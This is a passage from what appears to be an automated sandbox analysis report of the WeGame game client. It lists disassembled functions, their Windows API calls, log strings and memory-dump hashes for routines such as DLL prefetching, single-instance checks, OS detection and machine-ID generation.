                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: .bak$[AsyncTask]Delete file fail: %d.$[AsyncTask]Delete file success: %s.$[AsyncTask]Rename file fail: %s - %d.$[AsyncTask]Rename file success: %s.$\devtools_resources.pak$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464E8B
                                                                  • Part of subcall function 00461233: __EH_prolog3_GS.LIBCMT ref: 0046123D
                                                                  • Part of subcall function 00461233: ?is_certificate_open@util_curl_certificate@ierd_tgp@@YA_NXZ.COMMON(00000110,00464E97,00000070,0045A152), ref: 00461242
                                                                  • Part of subcall function 00461233: ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000110,00464E97,00000070,0045A152), ref: 00461256
                                                                  • Part of subcall function 00461233: ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 0046135B
                                                                  • Part of subcall function 00461233: ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 00461386
                                                                  • Part of subcall function 00463A3A: __EH_prolog3_GS.LIBCMT ref: 00463A44
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,00000208,000008D0,00464E9E,00000070,0045A152), ref: 00463A59
                                                                  • Part of subcall function 00463A3A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00463A6F
                                                                  • Part of subcall function 00463A3A: ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 00463A9B
                                                                  • Part of subcall function 00463A3A: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?), ref: 00463ACE
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?), ref: 00463AFD
                                                                  • Part of subcall function 00463A3A: FindFirstFileW.KERNEL32(?,?,?,00000000,00000208,?,?,?,?,?), ref: 00463B52
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,0000020A), ref: 00463B86
                                                                  • Part of subcall function 00463A3A: wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,00000104,?,00000000,0000020A), ref: 00463B9B
                                                                  • Part of subcall function 00463A3A: wcsncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,00481998,00000103), ref: 00463BAF
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464EBE
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00464ECA
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00464EE2
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464F59
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00464F69
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00464F81
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464FF8
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00465008
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00465020
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00465094
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 004650A4
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 004650BC
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00465133
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00465143
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 0046515B
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000070,0045A152), ref: 004651BB
                                                                • ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,004A8714,00000070,0045A152), ref: 004651CB
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(?,004A8714,00000070,0045A152), ref: 004651D8
                                                                • ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,004A87E4,?,004A8714,00000070,0045A152), ref: 004651E8
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: PrefetchImage TPFCustom.dll failed$PrefetchImage TenioTPF.dll failed$PrefetchImage common.dll failed$PrefetchImage wgcore.dll failed$common.dll$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$feature_module.dll$tcls\tenio\TPFCustom.dll$tcls\tenio\TenioTPF.dll$wgcore.dll
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function at 6bd25922 (graph not reproduced)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2592C
                                                                • ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?,000000D4,6BD24672,?,?,?,?,?,?,?,00000001,?,6BD25055,?,?,?), ref: 6BD25998
                                                                  • Part of subcall function 6BD60FFE: __EH_prolog3.LIBCMT ref: 6BD61005
                                                                  • Part of subcall function 6BD60FFE: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000,0000000C,6BD5FDE7,?), ref: 6BD61021
                                                                  • Part of subcall function 6BD27226: __EH_prolog3_GS.LIBCMT ref: 6BD2722D
                                                                  • Part of subcall function 6BD27226: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000024,6BD2733A,6BD43A1D,00000004,6BD574D1,?,?,?,?,?,?), ref: 6BD2727C
                                                                  • Part of subcall function 6BD27457: __EH_prolog3_GS.LIBCMT ref: 6BD2745E
                                                                  • Part of subcall function 6BD274B1: __EH_prolog3_GS.LIBCMT ref: 6BD274B8
                                                                  • Part of subcall function 6BD274B1: ?gen_id_by_name@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@0@Z.COMMON(?,?,?,B15238A8-2061-4a6e-AB8D-F2533B92D794,00000024,00000024,6BD25A0E,?,?,?,?,?,000000D4,6BD24672,?,?), ref: 6BD274F9
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,loop_event_name,?), ref: 6BD25C08
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?), ref: 6BD25C33
                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 6BD25C62
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,ZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC2), ref: 6BD25CB2
                                                                  • Part of subcall function 6BDCDB10: __EH_prolog3_GS.LIBCMT ref: 6BDCDB17
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6BD25CD7
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 6BD25CE8
                                                                  • Part of subcall function 6BDCDB10: ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,0000003C,6BD25C0D,?,loop_event_name,?), ref: 6BDCDB88
                                                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 6BD25D06
                                                                • SetEvent.KERNEL32(00000000), ref: 6BD25D13
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD25D1A
                                                                • GetCommandLineW.KERNEL32 ref: 6BD25D20
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000000), ref: 6BD25D5A
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,TGP_EXTERNAL_MESSAGE_RECEIVER,?,?,00000000), ref: 6BD25D8C
                                                                • FindWindowA.USER32(Static,?), ref: 6BD25DA9
                                                                • IsWindow.USER32(00000000), ref: 6BD25DB2
                                                                • SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 6BD25DD1
                                                                • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD25DE2
                                                                • _CxxThrowException.VCRUNTIME140(?,6C03D4D4,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD25E91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: -launcher$0/#v$31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$Static$TGP_EXTERNAL_MESSAGE_RECEIVER$WeGameCN_Mutex$ZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC2$loop_event_name
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function at 6bdbda53 (graph not reproduced)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBDA5D
                                                                • memset.VCRUNTIME140(?,00000000,00000118,000001DC), ref: 6BDBDA83
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 6BDBDA9C
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON(00000000,?), ref: 6BDBDC6F
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: %1%.%2%$-32$-64$Server2003$Service Pack 1$Service Pack 2$Service Pack 3$Vista$Win10$Win11$Win2000$Win7$Win8$WinNT4.0$WinXP-NoSP$WinXP-SP1$WinXP-SP2$WinXP-SP3$unknown
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function at 6bd275ff (graph not reproduced)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD27606
                                                                  • Part of subcall function 6BD24F63: __EH_prolog3.LIBCMT ref: 6BD24F6A
                                                                • _Copy_construct_from.LIBCPMT ref: 6BD27648
                                                                • ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,00000068), ref: 6BD27656
                                                                • GetTickCount.KERNEL32 ref: 6BD27676
                                                                • GetTickCount.KERNEL32 ref: 6BD27683
                                                                • GetTickCount.KERNEL32 ref: 6BD2768A
                                                                • GetTickCount.KERNEL32 ref: 6BD2769C
                                                                • GetTickCount.KERNEL32 ref: 6BD276B2
                                                                • GetTickCount.KERNEL32 ref: 6BD276C8
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD276EC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD276FF
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000000,00000001,e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp,0000026E,6C02E7BF), ref: 6BD27739
                                                                • GetTickCount.KERNEL32 ref: 6BD277C0
                                                                • GetTickCount.KERNEL32 ref: 6BD277CD
                                                                • GetTickCount.KERNEL32 ref: 6BD277E6
                                                                • Sleep.KERNEL32(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD277F5
                                                                • _Copy_construct_from.LIBCPMT ref: 6BD27838
                                                                • ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(?,?,?,?), ref: 6BD27846
                                                                  • Part of subcall function 6BD2788D: ?stamp_point@@YAXPBD@Z.COMMON(sys_begin,?), ref: 6BD2789B
                                                                  • Part of subcall function 6BD2788D: QueryPerformanceFrequency.KERNEL32(6C0984B0,?), ref: 6BD278B3
                                                                  • Part of subcall function 6BD2788D: QueryPerformanceCounter.KERNEL32(?,?), ref: 6BD278BD
                                                                  • Part of subcall function 6BD2788D: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6BD27A15
                                                                  • Part of subcall function 6BD2788D: ?stamp_point@@YAXPBD@Z.COMMON(sys_end), ref: 6BD27A28
                                                                Strings
                                                                • true, xrefs: 6BD27750, 6BD27758
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp, xrefs: 6BD27723
                                                                • false, xrefs: 6BD27746
                                                                • [app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s, xrefs: 6BD2775F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: [app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s$e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp$false$true
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function at 6bd85f39 (graph not reproduced)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD85F43
                                                                • memset.VCRUNTIME140(?,00000000,00000006,00000358,6BD85EF7,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F5C
                                                                  • Part of subcall function 6BD84034: __EH_prolog3_GS.LIBCMT ref: 6BD8403E
                                                                  • Part of subcall function 6BD84034: memset.VCRUNTIME140(?,00000000,00000094,0000009C,6BD86019,?,?,?,?,?,00000000,00000006,00000358,6BD85EF7,6C09F000), ref: 6BD84061
                                                                  • Part of subcall function 6BD84034: GetVersionExA.KERNEL32(00000094), ref: 6BD8407A
                                                                  • Part of subcall function 6BD85904: memset.VCRUNTIME140(?,00000000,00000031,6C09F000,?,?), ref: 6BD85935
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,6C09F000,?,?), ref: 6BD85968
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD85973
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD85981
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD8598F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000105,?,?,00000000,?), ref: 6BD8629B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000105,?,?,00000000,?), ref: 6BD862F6
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD86217
                                                                  • Part of subcall function 6BD86CC1: __EH_prolog3.LIBCMT ref: 6BD86CCB
                                                                  • Part of subcall function 6BD86CC1: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6BD10520,00000002,00000001,000000AC,6BD86327,?,000000FF,?), ref: 6BD86CF7
                                                                  • Part of subcall function 6BD86CC1: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000002,00000000), ref: 6BD86D07
                                                                  • Part of subcall function 6BD86CC1: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000003), ref: 6BD86D27
                                                                  • Part of subcall function 6BD86CC1: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 6BD86D57
                                                                  • Part of subcall function 6BD85E72: memset.VCRUNTIME140(?,00000000,?,?,6BFA8CB0,?,?,6BD861FE,?,?,00000021), ref: 6BD85E82
                                                                  • Part of subcall function 6BD85E72: ?MD5String@@YAPADPAD@Z.COMMON(?), ref: 6BD85E96
                                                                  • Part of subcall function 6BD85E72: strnlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6BD85E9F
                                                                  • Part of subcall function 6BD85E72: _memcpy_s.PGOCR ref: 6BD85EB0
                                                                  • Part of subcall function 6BD85E72: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BD85EBE
                                                                  • Part of subcall function 6BD851CE: __EH_prolog3_GS.LIBCMT ref: 6BD851D8
                                                                  • Part of subcall function 6BD851CE: _strnset_s.API-MS-WIN-CRT-STRING-L1-1-0(00000010,00000000,00000000,-00000001,00000144,6BD8624B,000000FF,?,00000105,00000000), ref: 6BD85225
                                                                  • Part of subcall function 6BD851CE: memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD85238
                                                                  • Part of subcall function 6BD851CE: SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BD8524F
                                                                  • Part of subcall function 6BD851CE: CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD852DA
                                                                  • Part of subcall function 6BD851CE: GetLastError.KERNEL32 ref: 6BD852EA
                                                                  • Part of subcall function 6BD851CE: GetLastError.KERNEL32 ref: 6BD852F3
                                                                • ?Init@md5@@QAEXXZ.COMMON(?,000000FF), ref: 6BD86467
                                                                • ?Update@md5@@QAEXPAEI@Z.COMMON(?,?,?,000000FF), ref: 6BD8648D
                                                                • ?Finalize@md5@@QAEXXZ.COMMON(?,?,?,000000FF), ref: 6BD86498
                                                                • _memcpy_s.PGOCR ref: 6BD864AD
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,000000FF), ref: 6BD864B5
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,000000FF,?), ref: 6BD8655B
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config1,00000000,?,00000021,?), ref: 6BD85A69
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config2,00000000,?,00000021,?), ref: 6BD85A7D
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config3,00000000,?,00000021,?), ref: 6BD85A91
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config4,00000000,?,00000021,?), ref: 6BD85AA9
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileIntA.KERNEL32(Profile,config5,00000000,?), ref: 6BD85AB4
                                                                  • Part of subcall function 6BD859DA: _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BD85AD3
                                                                  • Part of subcall function 6BD859DA: _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BD85AF1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,000000FF,?), ref: 6BD865B7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,000000FF,?), ref: 6BD8662E
                                                                Strings
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC success, Get GUID from MAC & PhysicsDrive, xrefs: 6BD864F0
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid_seq_id_generator_husk.cpp, xrefs: 6BD862BF, 6BD864D9, 6BD865E3, 6BD86652
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetIDFromFile failed, GenerateID and SetIDToFile, xrefs: 6BD86669
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetCacheGuid success, return, xrefs: 6BD862D6
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC failed, GetIDFromFile..., xrefs: 6BD865FA
                                                                • P, xrefs: 6BD86256
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$PrivateProfile$?get_log_instance@base@@Logger@1@Stringmemmove$D@std@@@std@@H_prolog3_U?$char_traits@$??6?$basic_ostream@CloseErrorH_prolog3LastV01@_memcpy_s_stricmp$??1?$basic_ios@?setw@std@@ChangeCreateDirectoryFinalize@md5@@FindFolderH_prolog3_catch_HandleInit@md5@@J@1@_NotificationPathSmanip@_String@@U?$_Update@md5@@V21@@VersionVios_base@1@_strnset_sfreestrnlen
                                                                • String ID: P$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC failed, GetIDFromFile...$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC success, Get GUID from MAC & PhysicsDrive$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetCacheGuid success, return$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetIDFromFile failed, GenerateID and SetIDToFile$e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid_seq_id_generator_husk.cpp
                                                                • API String ID: 4086279409-3844285129
                                                                • Opcode ID: 187adf1bf3a031a33fe087a16426542c68de105b554113a0a7dccc19a269718d
                                                                • Instruction ID: 9f8f7e2e5ac0e5bb1c3ac0adba107fc85ad507fbfd3bedb285bb7e73e6fd585f
                                                                • Opcode Fuzzy Hash: 187adf1bf3a031a33fe087a16426542c68de105b554113a0a7dccc19a269718d
                                                                • Instruction Fuzzy Hash: 3522A071C01298EADF25DBB4CC45BDEBBB8AF16318F1440D9D149AB181EB785B88CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00463E13
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,000000C0,00463C2D,00000000,00459F4F), ref: 00463E62
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,log), ref: 00463E8D
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,log), ref: 00463EA0
                                                                  • Part of subcall function 0045CBE9: __EH_prolog3_GS.LIBCMT ref: 0045CBF0
                                                                  • Part of subcall function 0045CBE9: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,00000024,00463EB7,?,00000000,?,?,log), ref: 0045CC20
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?IsSubWegameProcess@util_multi_instance@ierd_tgp@@YA_NXZ.COMMON(?,?,log), ref: 00463EE4
                                                                • ?GetWegameProcessCount@util_multi_instance@ierd_tgp@@YAHXZ.COMMON(?,?,log), ref: 00463EF1
                                                                  • Part of subcall function 0046C021: __EH_prolog3.LIBCMT ref: 0046C028
                                                                  • Part of subcall function 0045162B: __EH_prolog3.LIBCMT ref: 00451632
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                Strings
